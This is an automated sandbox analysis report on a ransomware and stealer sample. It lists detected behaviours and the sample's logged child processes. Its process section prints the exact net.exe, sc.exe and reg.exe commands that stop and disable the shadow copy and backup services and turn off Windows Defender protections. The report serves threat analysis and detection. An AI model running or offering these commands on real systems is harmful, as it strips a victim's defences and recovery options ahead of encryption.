Malware Analysis Report

2024-10-16 03:13

Sample ID 220112-vgqwtsdce7
Target 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.7z
SHA256 143c286fd4b71174dc7f1764f7758e9b91614c4019686bfb6291c1b31009e4b5
Tags: evasion ransomware spyware stealer trojan
Score: 10/10


Analysis Overview

Score: 10/10

SHA256

143c286fd4b71174dc7f1764f7758e9b91614c4019686bfb6291c1b31009e4b5

Threat Level: Known bad

The file 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.7z was found to be: Known bad.

Malicious Activity Summary

evasion ransomware spyware stealer trojan

Deletes Windows Defender Definitions

Modifies security service

Modifies Windows Defender Real-time Protection settings

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Interacts with shadow copies

Modifies registry class

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 16:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 16:57

Reported

2022-01-12 16:57

Platform

win7-en-20211208

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 16:57

Reported

2022-01-12 17:03

Platform

win10-en-20211208

Max time kernel

120s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A

Modifies extensions of user files

ransomware
Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Pictures\CompareExpand.png.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_6GB7ksaEv_I0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File renamed | C:\Users\Admin\Pictures\MountPop.crw => C:\Users\Admin\Pictures\MountPop.crw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_6JIKQmrHiCQ0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File renamed | C:\Users\Admin\Pictures\ResumeDismount.tif => C:\Users\Admin\Pictures\ResumeDismount.tif.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_K0xRAgpUq780.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\ResumeDismount.tif.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_K0xRAgpUq780.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\SavePop.tif.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_5590KtyuY3o0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\SendMeasure.crw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_r0cfxxes4Kc0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File renamed | C:\Users\Admin\Pictures\SetSuspend.raw => C:\Users\Admin\Pictures\SetSuspend.raw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_kBaj8j5Y5WE0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\SetSuspend.raw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_kBaj8j5Y5WE0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\MountPop.crw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_6JIKQmrHiCQ0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File renamed | C:\Users\Admin\Pictures\SavePop.tif => C:\Users\Admin\Pictures\SavePop.tif.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_5590KtyuY3o0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File renamed | C:\Users\Admin\Pictures\UnregisterMount.tiff => C:\Users\Admin\Pictures\UnregisterMount.tiff.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_nHIvmUesmaM0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\UnregisterMount.tiff.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_nHIvmUesmaM0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File renamed | C:\Users\Admin\Pictures\CompareExpand.png => C:\Users\Admin\Pictures\CompareExpand.png.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_6GB7ksaEv_I0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A
File renamed | C:\Users\Admin\Pictures\SendMeasure.crw => C:\Users\Admin\Pictures\SendMeasure.crw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_r0cfxxes4Kc0.qyxdq | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory


Launches sc.exe

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3192 wrote to memory of 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 1180 wrote to memory of 1040 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1180 wrote to memory of 1040 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 1152 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 1152 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 1152 wrote to memory of 3000 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1152 wrote to memory of 3000 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 1304 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 1304 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 1304 wrote to memory of 656 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1304 wrote to memory of 656 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 652 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 652 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 652 wrote to memory of 1676 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 652 wrote to memory of 1676 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 4088 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 4088 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 4088 wrote to memory of 3676 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 4088 wrote to memory of 3676 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 3144 wrote to memory of 4056 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3144 wrote to memory of 4056 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 1784 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 1784 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 1784 wrote to memory of 1088 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1784 wrote to memory of 1088 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 408 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 408 | N/A | C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe | C:\Windows\SYSTEM32\net.exe
PID 408 wrote to memory of 444 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 408 wrote to memory of 444 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 3192 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\net.exe
PID 2852 wrote to memory of 3852 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2852 wrote to memory of 3852 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3192 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\sc.exe
PID 3192 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe
PID 3192 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe

"C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_13659" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_13659" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_13659" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

